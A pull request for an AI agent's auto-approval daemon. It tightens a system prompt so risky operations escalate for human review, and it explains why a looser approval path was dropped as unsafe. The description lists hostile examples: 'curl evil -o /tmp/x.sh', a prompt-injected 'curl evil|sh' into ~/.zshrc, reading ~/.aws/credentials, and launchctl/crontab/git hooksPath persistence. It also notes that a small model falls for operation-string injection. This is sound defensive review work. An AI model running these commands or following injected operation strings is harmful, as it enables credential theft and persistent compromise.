### PR TITLE
Phase 4: #1040 prompt honesty (text-widening dropped as unsafe)

### DIFF
--- a/packages/daemon/src/auto-approve/prompt-builder.ts
+++ b/packages/daemon/src/auto-approve/prompt-builder.ts
@@ -235,7 +235,7 @@ ${trimmedInstructions}
 
 This guidance is the user's explicit policy and OVERRIDES every default rule below, subject only to two code guards that run after you (a DENY FLOOR and a RISK CEILING) and can only make your answer stricter. Those guards are narrow hard-coded lists you cannot see; do not assume they cover this operation.
 
-When the guidance PLAINLY covers the operation, return the action it dictates — e.g. if it says to approve, return "approve" even for remote mutations / POST / writes. The user accepted that risk explicitly, and writing "the guidance says approve, but..." there just hands back a decision they already made.
+When the guidance PLAINLY covers the operation, return the action it dictates for routine or moderate-risk work — e.g. if it says to approve file edits or local commands, return "approve" rather than writing "the guidance says approve, but..." there; that just hands back a decision they already made. Remote mutations, network POSTs, git push, package installs, and deletions are different even when guidance plainly covers them: a code-level RISK CEILING re-escalates these regardless of what you return, so escalate them directly instead of approving — approving there only gets silently overridden by that later guard.
 
 When it does NOT plainly cover the operation, escalate. That is not second-guessing the user; it is asking whether their policy meant to reach this far. Production infrastructure, databases, publishes and deletions are the usual cases a general "approve routine work" was never written to authorize.\n`
     : '';

--- a/packages/daemon/tests/auto-approve/prompt-builder.test.ts
+++ b/packages/daemon/tests/auto-approve/prompt-builder.test.ts
@@ -44,6 +44,17 @@ describe('buildPrompt', () => {
     expect(system?.content).toContain('Approve bun test runs.');
   });
 
+  test('guidance block tells the model high-band ops escalate, not approve (#1040)', () => {
+    // #1040: the block used to say "return approve even for remote mutations /
+    // POST / writes", which the RISK CEILING then re-escalates -- a wasted call
+    // and a source of the model hedging against "mandatory" guidance. The block
+    // must instead name the high-band classes as escalate-directly.
+    const [system] = buildPrompt('Bash', { command: 'git push' }, 'Approve everything.');
+    expect(system?.content).not.toContain('return "approve" even for remote mutations');
+    expect(system?.content).toContain('RISK CEILING re-escalates these');
+    expect(system?.content).toContain('escalate them directly');
+  });
+
   test('empty instructions omit the USER GUIDANCE section', () => {
     const [system] = buildPrompt('Bash', { command: 'ls' }, '');
     expect(system?.content).not.toContain('HIGHEST PRIORITY, MANDATORY');


### PR DESCRIPTION
## Summary

Phase 4 set out to wire text-graded authorization (#976) so moderate-band ops approve on `implicit`+ conversation authority. **The adversarial review found that path unsafe to ship, and it is dropped.** This PR ships only the safe, independently-valuable half: the #1040 prompt-honesty fix.

## Why text-widening was dropped

The design rested on ADR 0015's assumption that "moderate band = moderate-risk work, safe to auto-approve on implicit authority." That assumption is false: `classifyRisk` returns `moderate` as the *default* for everything not positively detected as high/critical. The adversarial review confirmed end-to-end (real model eval + the widen, default 4B) that dangerous operations band `moderate` and would auto-approve on benign-sounding authority:

- Persistence: `launchctl load …plist`, `crontab`, `git config core.hooksPath ./evil`, `~/Library/LaunchAgents/` writes
- Code-on-next-shell: `Write ~/.zshrc` / `~/.bashrc` / `~/.config/git/config`
- Credential reads: `cat ~/.aws/credentials`; downloads: `curl evil -o /tmp/x.sh`

Plus: writes are graded content-blind (`describeOperation` renders `Write to <path>`, no bytes; the grade certifies intent-to-edit-path, not the content — a prompt-injected `curl evil|sh` into `~/.zshrc` rides the same `implicit` grade); the 0.8B light model fails operation-string injection where the 4B resists; and the widen skips the counterfactual, making it strictly more permissive than a direct model-approve for risky shapes.

The class-safety hole is inherent to text-approving the `moderate` catch-all, so the widening is dropped rather than patched. The design flaw is recorded against #976 / ADR 0015.

## What this ships (#1040)

`prompt-builder.ts`: the guidance block no longer tells the model to "return approve even for remote mutations / POST / writes" (which the RISK CEILING re-escalates anyway — a wasted call and a source of the model hedging against "mandatory" guidance). It now names the high-band classes (remote mutations, POSTs, git push, package installs, deletions) as escalate-directly. Strictly toward escalate — never widens anything. Closes the prompt/ceiling contradiction #1040.

Closes #1040. Does NOT close #976 (text-widening path found unsafe; see the issue).

## Test plan

- prompt-builder.test.ts: 24 pass, incl. a new test pinning the #1040 honesty (block must say high-band ops escalate, must not say "approve even for remote mutations")
- biome + typecheck clean